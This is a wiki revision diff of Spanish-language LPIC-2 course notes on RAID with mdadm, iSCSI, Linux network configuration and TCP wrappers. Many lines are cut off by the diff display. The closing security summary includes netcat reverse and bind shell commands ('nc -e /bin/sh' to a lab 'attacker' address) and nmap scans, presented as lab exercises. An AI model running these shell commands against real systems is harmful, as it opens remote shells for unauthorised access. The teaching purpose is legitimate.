Diferències
Ací es mostren les diferències entre la revisió seleccionada i la versió actual de la pàgina.
| Ambdós costats versió prèvia Revisió prèvia Següent revisió | Revisió prèvia | ||
| info:cursos:pue:lpic2-2021:s7 [23/02/2021 12:39] – [Networking Configuration] mate | info:cursos:pue:lpic2-2021:s7 [18/09/2022 23:47] (actual) – [LPIC2 2021 Sesión 7 (2021-02-23)] mate | ||
|---|---|---|---|
| Línia 1: | Línia 1: | ||
| - | = LPIC2 2021 Sesión 7 (2021-02-23) | + | = LPIC2 2021 Sesión 7 (2021-02-23) |
| == Documentación relacionada: | == Documentación relacionada: | ||
| * Manual Certificacion LPIC-2.pdf, pag 72 | * Manual Certificacion LPIC-2.pdf, pag 72 | ||
| Línia 10: | Línia 10: | ||
| == Clase | == Clase | ||
| === RAID | === RAID | ||
| - | <callout type=" | + | <callout type=" |
| - | <callout type=" | + | <callout type=" |
| * en certificación no preguntan por que es cada RAID (0,1,5,6) | * en certificación no preguntan por que es cada RAID (0,1,5,6) | ||
| - | * '' | + | * '' |
| + | * **-C**: crear volume RAID | ||
| + | * **%%--%%create** | ||
| + | * **-S**: desactiva RAID y recursos | ||
| + | * **-v**: verbose | ||
| + | * **%%--%%verbose** | ||
| + | * **/ | ||
| + | * **-l**: nivel de raid: 0,1,5 | ||
| + | * **%%--%%level** | ||
| + | * **-n** | ||
| + | * **%%--%%raid-devices** | ||
| + | * **-D**: comprobación del volumen | ||
| + | * **/ | ||
| + | * **%%--%%spare-devices=< | ||
| + | * **%%--%%detail**: | ||
| + | * **-f < | ||
| + | * **%%--%%fail** | ||
| + | * OJO con raid 0, pueden perderse datos dependiendo de la confiración del spare | ||
| + | * **-r < | ||
| + | * **%%--%%remove** | ||
| + | * **-a < | ||
| + | * **%%--%%add** | ||
| + | * **%%--%%stop**: | ||
| + | * **%%--%%remove**: | ||
| + | * intent bitmap: | ||
| + | * Una cosa importante es contar con el Intent Bitmap activo, esto es una característica que se le agrega a un arreglo por software y permite hacer sincronizaciones diferenciales entre los discos tras producirse una falla, reduciendo asi los tiempos al no tener que sincronizar el disco completo cada vez que algo ocurre. | ||
| + | * '' | ||
| + | * '' | ||
| + | * '' | ||
| + | * **%%--%%query [< | ||
| + | * **%%--%%examine < | ||
| * **/ | * **/ | ||
| - | <callout type=" | + | * '' |
| + | * **mdadm** no depende de este fichero de configuración para su funcionamiento. Es una manera adicińal de seguir las pista. | ||
| + | * **/etc/ | ||
| + | * | ||
| <callout type=" | <callout type=" | ||
| ==== Laboratorio | ==== Laboratorio | ||
| - | <callout type=" | + | <callout type=" |
| * crear partición (100%) del tipo Linux RAID **fd** en los discos sdb,sdc,sdd | * crear partición (100%) del tipo Linux RAID **fd** en los discos sdb,sdc,sdd | ||
| - | * '' | + | * '' |
| * nuevo dispositivo **/ | * nuevo dispositivo **/ | ||
| * el nombre ha de ser **/ | * el nombre ha de ser **/ | ||
| Línia 29: | Línia 62: | ||
| * '' | * '' | ||
| * '' | * '' | ||
| - | * dejamos en terminal abierto una monitorización sobre el RAID: '' | + | * dejamos en terminal abierto una monitorización sobre el RAID: '' |
| * forzamos el fallo de uno de los discos: '' | * forzamos el fallo de uno de los discos: '' | ||
| * podemos ver en el terminal de **watch** como el sistema reemplaza el sdb1 por el spare sdd1 | * podemos ver en el terminal de **watch** como el sistema reemplaza el sdb1 por el spare sdd1 | ||
| Línia 39: | Línia 72: | ||
| * '' | * '' | ||
| * '' | * '' | ||
| - | * es importante eliminar el superbloque (metadatos): | + | * es importante eliminar el superbloque (metadatos): |
| * eliminar configuración: | * eliminar configuración: | ||
| * otro comando: '' | * otro comando: '' | ||
| Línia 51: | Línia 84: | ||
| === Cabina ISCSI | === Cabina ISCSI | ||
| - | <callout type=" | + | <callout type=" |
| - | | + | <callout type=" |
| * cabinas con openfiler, para conectarnos | * cabinas con openfiler, para conectarnos | ||
| * [[http:// | * [[http:// | ||
| Línia 59: | Línia 92: | ||
| === Networking Configuration | === Networking Configuration | ||
| - | * documentos: | + | <callout type=" |
| - | * doc: Manual Certificacion LPIC-2.pdf, pag 145 | + | <callout type=" |
| - | * doc: Material Practicas LPIC-2/ | + | <callout type=" |
| - | * doc: Material Practicas LPIC-2/ | + | |
| + | * [[tcpip: | ||
| + | |||
| + | === Networking Configuration: | ||
| * '' | * '' | ||
| - | * nombrar las tarjetas de red con **ethX** | + | * nombrar las tarjetas de red a **ethX**: |
| * **biosdecode** | * **biosdecode** | ||
| * modificar **/ | * modificar **/ | ||
| * < | * < | ||
| - | * archivo de configuración: | + | * archivo de configuración |
| * al modificar: **systemctl restart network**, **ip link set < | * al modificar: **systemctl restart network**, **ip link set < | ||
| - | * desactivar IPv6 (si no se ha de utilizar) | + | * desactivar IPv6 (si no se ha de utilizar) |
| - | * **NetworkManager** | + | * **NetworkManager**: nuevo gestor con perfiles, en sustitución del anterior |
| - | * **hostname** | + | ==== hostname |
| - | * centos7: | + | * centos7: |
| - | * **/ | + | * **/ |
| - | * '' | + | * '' |
| - | * centos6: | + | * centos6: |
| - | * **/ | + | * **/ |
| - | * modificar **/ | + | * modificar **/ |
| - | * que las máquinas se puedan resolver entre ellas | + | |
| - | * como buena práctica, que sepa resolverse a si misma | + | ==== configuración cliente DNS |
| * **/ | * **/ | ||
| * nameserver: servidores que resuelven | * nameserver: servidores que resuelven | ||
| * search: sufijo de búsqueda (lo que añade a los nombres que usamos para localizar máquinas) | * search: sufijo de búsqueda (lo que añade a los nombres que usamos para localizar máquinas) | ||
| * domain: el dominio en el que trabajamos | * domain: el dominio en el que trabajamos | ||
| + | |||
| + | ==== puertas de enlace | ||
| + | definir rutas estáticas a otras redes | ||
| * '' | * '' | ||
| - | | + | |
| - | | + | |
| - | * '' | + | ==== alias IP |
| - | * renombro IPADDR a IPADDR0 y NETMASK a NETMASK0 | + | asignar |
| - | * añado IPADDR1 y NETMASK1 con diferente IP | + | * '' |
| - | * '' | + | * renombro IPADDR a IPADDR0 y NETMASK a NETMASK0 |
| - | * copiar / | + | * añado IPADDR1 y NETMASK1 con diferente IP |
| + | * '' | ||
| + | * copiar / | ||
| * forward paquetes (reenvio de paquetes entre 2 redes en 2 interfaces: | * forward paquetes (reenvio de paquetes entre 2 redes en 2 interfaces: | ||
| * **/ | * **/ | ||
| - | | + | |
| - | * resolución usuarios | + | * **/ |
| - | * **nmtui**: networkManager " | + | * **nmtui**: networkManager " |
| * '' | * '' | ||
| - | * **nmcli**: networkManager " | + | * **nmcli**: networkManager " |
| - | * <alert type=" | + | |
| * '' | * '' | ||
| * nos permite crear los ficheros de configuración (desde cero) en un comando | * nos permite crear los ficheros de configuración (desde cero) en un comando | ||
| * debian: | * debian: | ||
| * **/ | * **/ | ||
| - | * '' | + | * '' |
| - | * <alert type=" | + | |
| - | * '' | + | ==== arp |
| * '' | * '' | ||
| + | * **-n**: consultar caché | ||
| + | * **-d < | ||
| + | * **-s < | ||
| + | * **-f < | ||
| + | dirección_macndirección_ip1 | ||
| + | dirección_ip2 | ||
| + | dirección_ipn | ||
| + | </ | ||
| + | |||
| + | === Networking Configuration: | ||
| * '' | * '' | ||
| * '' | * '' | ||
| * '' | * '' | ||
| - | * '' | + | * '' |
| - | * <alert type="info">Material Practicas LPIC-2/ | + | |
| * shell reverso | * shell reverso | ||
| * '' | * '' | ||
| Línia 122: | Línia 171: | ||
| * '' | * '' | ||
| * '' | * '' | ||
| - | ==== Troubleshoting | ||
| * '' | * '' | ||
| * '' | * '' | ||
| * '' | * '' | ||
| + | * '' | ||
| + | * [[info: | ||
| + | * '' | ||
| + | |||
| + | === Networking Configuration: | ||
| + | <callout type=" | ||
| + | Es posible administrar el acceso a un sistema Linux según la dirección IP o el nombre del host cliente. Se puede gestionar una lista de «todos los que están autorizados», | ||
| + | |||
| + | La implementación TCP Wrappers utilizada en los sistemas Linux se sustenta en la librería libwrap. | ||
| + | |||
| * **/ | * **/ | ||
| - | * <alert type=" | + | |
| - | * <alert type=" | + | * 3 etapas de comprobación de acceso a un servicio embebido TCP: |
| - | | + | * está autorizado expresamente |
| - | * 3 etapas de comprobación de acceso a un servicio embebido TCP: | + | * está denegado expresamente |
| - | * está autorizado expresamente | + | * permitido por defecto |
| - | * está denegado expresamente | + | * usa expresiones en sus ficheros de configuración para permitir (o denegar) |
| - | * permitido por defecto | + | * ALL |
| - | * usa expresiones en sus ficheros de configuración para permitir (o denegar) | + | * LOCAL |
| - | * ALL | + | * UNKOWN |
| - | * LOCAL | + | * KNOWN |
| - | * UNKOWN | + | * PARANOID |
| - | * KNOWN | + | * EXCEPT |
| - | * PARANOID | + | * permitimos en **allow**, denegamos en **deny** (o tendrá acceso por la tercera regla) |
| - | * EXCEPT | + | <callout |
| - | * permitimos en **allow**, denegamos en **deny** (o tendrá acceso por la tercera regla) | + | |
| - | | + | === Resumen seguridad servicios |
| - | | + | <callout type=" |
| - | * [[info:cursos:pue:lpic2-2021:s1#sar]] | + | < |
| + | Resumen Seguridad de servicos y de red pagina 479 Manual curso LPIC-1 | ||
| + | |||
| + | |||
| + | find / -type f -perm -4000 | ||
| + | find / -type d -perm -2000 | ||
| + | find / -type d -perm -1000 | ||
| + | |||
| + | ##El comando lsof le ayuda a determinar | ||
| + | ##qué proceso está utilizando un archivo del punto de montaje en el momento de iniciar el comando | ||
| + | lsof /backup/ | ||
| + | lsof /backup/ | ||
| + | COMMAND | ||
| + | bash 8153 root cwd DIR | ||
| + | |||
| + | ##Como administrador, | ||
| + | fuser -km /backup | ||
| + | kill -9 8153 | ||
| + | |||
| + | El comando nmap es un escaneador de puertos: | ||
| + | yum install nmap -y | ||
| + | nmap localhost | ||
| + | namap -A 192.168.1.125 | ||
| + | |||
| + | yum install nmap-frontend -y | ||
| + | zenmap | ||
| + | ----------------------------------------------------------------------------------------------------------------- | ||
| + | ###110.2 Setup host security## | ||
| + | |||
| + | Servicios de red xinetd -->Pag del manual 419 | ||
| + | yum install xinetd | ||
| + | |||
| + | Los archivos de configuración son: | ||
| + | • / | ||
| + | • / | ||
| + | Existe un archivo por servicio, con el mismo nombre que el especificado en / | ||
| + | |||
| + | ##Si modificamos ficheros de configuracion reiniciamos los servicios | ||
| + | service xinetd restart | ||
| + | --------------------------------------------------------------------------------------------- | ||
| + | ############# | ||
| + | |||
| + | ##Resumen manual de LPIC-1 pagina 484 | ||
| + | Los archivos de configuración son / | ||
| + | |||
| + | ##Cada programa que utiliza los tcp_wrappersse compila con la librería libwrap de manera estática | ||
| + | (el comando ldd no permite ver la librería). | ||
| + | |||
| + | [root@sercentos7 ~]# strings -f / | ||
| + | / | ||
| + | |||
| + | Si no se devuelve ninguna línea, el programa no utiliza las tcp_wrappers. | ||
| + | Entre los servicios que utilizan las tcp_wrappers, | ||
| + | • sendmail (incluyendo postfix); | ||
| + | • sshd (ssh); | ||
| + | • xinetd (y por lo tanto de manera indirecta todos los servicios asociados); | ||
| + | • vsftpd (ftp); | ||
| + | • portmap (y por lo tanto nis, nfs); | ||
| + | • in.telnetd (telnet), así como la mayoría de los servicios soportados por xinetd; | ||
| + | |||
| + | La comprobación de acceso a un servicio embebido TCP se hace en tres etapas: | ||
| + | • ¿se autoriza el acceso de manera explícita? | ||
| + | • si no es el caso, ¿se prohíbe el acceso de manera explícita? | ||
| + | • si no es el caso, por defecto, se autoriza el acceso. | ||
| + | |||
| + | |||
| + | Para verificar una regla, el sistema lee primero / | ||
| + | La búsqueda se detiene en la primera correspondencia encontrada. | ||
| + | Una línea en hosts.allow autoriza la conexión. | ||
| + | Una línea en hosts.deny prohíbe la conexión. | ||
| + | Si no se deniega de manera explícita el acceso, se autoriza: la petición no corresponde a ningún criterio. | ||
| + | |||
| + | |||
| + | Los archivos de configuración son / | ||
| + | |||
| + | En el ejemplo siguiente: | ||
| + | • Sólo los miembros de la subred 192.168.1.0 tienen permiso para conectarse al servidor ftp (prohibido para todos los demás). | ||
| + | • Los anfitriones puesto1 y puesto2 tienen acceso a telnet y portmap. | ||
| + | • Los anfitriones de baddominio.org, | ||
| + | • Se prohíbe el servicio pop/imap a todos los de la red 192.168.0.0, | ||
| + | |||
| + | / | ||
| + | | ||
| + | | ||
| + | | ||
| + | | ||
| + | |||
| + | |||
| + | # / | ||
| + | ALL: .baddominio.org except trusted.baddominio.org UNKNOWN | ||
| + | | ||
| + | | ||
| + | |||
| + | La lista de clientes admite una sintaxis avanzada: | ||
| + | • ALL: correspondencia sistemática. | ||
| + | • LOCAL: todos los anfitriones cuyo nombre no contiene punto (puesto1, puesto2, etc.). | ||
| + | • UNKNOWN: anfitrión cuyo nombre no se puede resolver. | ||
| + | • KNOWN: anfitrión cuyo nombre se puede resolver. | ||
| + | • PARANOID: anfitrión cuyo nombre no se puede resolver o cuyo IP no tiene resolución inversa. | ||
| + | • EXCEPT: permite excluir ciertos anfitriones. | ||
| + | ------------------------------------------------------------------------------------------------------------ | ||
| + | ##Reverse Shell-Netcat: | ||
| + | yum install nc -y | ||
| + | $ sudo apt-get update -y | ||
| + | $ sudo apt-get install netcat -y | ||
| + | |||
| + | Este software esta presente en casi todas las distribuciones y es la manera mas sencilla de obener Reverse. | ||
| + | Aun así en los sistemas en producción no suele estar disponible. | ||
| + | |||
| + | ##En la máquina del atacante 192.168.33.10 Centos8: | ||
| + | nc -lvp 1234 | ||
| + | |||
| + | ##En la máquina de la víctima 192.168.33.11 debian-10: | ||
| + | nc -e /bin/sh 192.168.33.10 1234 | ||
| + | |||
| + | |||
| + | |||
| + | ###Bind Shell- Netcat####: | ||
| + | |||
| + | Una bind shell utilizando Netcat. Una bind shell se diferencia de la reverse en que la escucha se realiza en la máquina víctima. | ||
| + | |||
| + | Para el ejemplo la ip de la víctima será la 10.10.10.2 | ||
| + | |||
| + | ##En la máquina de la víctima debian-10 192.168.33.11: | ||
| + | nc -lvp 1234 -e /bin/sh & | ||
| + | |||
| + | ##En la máquina del atacante, 192.168.33.11 es la maquina victima: | ||
| + | nc 192.168.33.11 1234 | ||
| + | </ | ||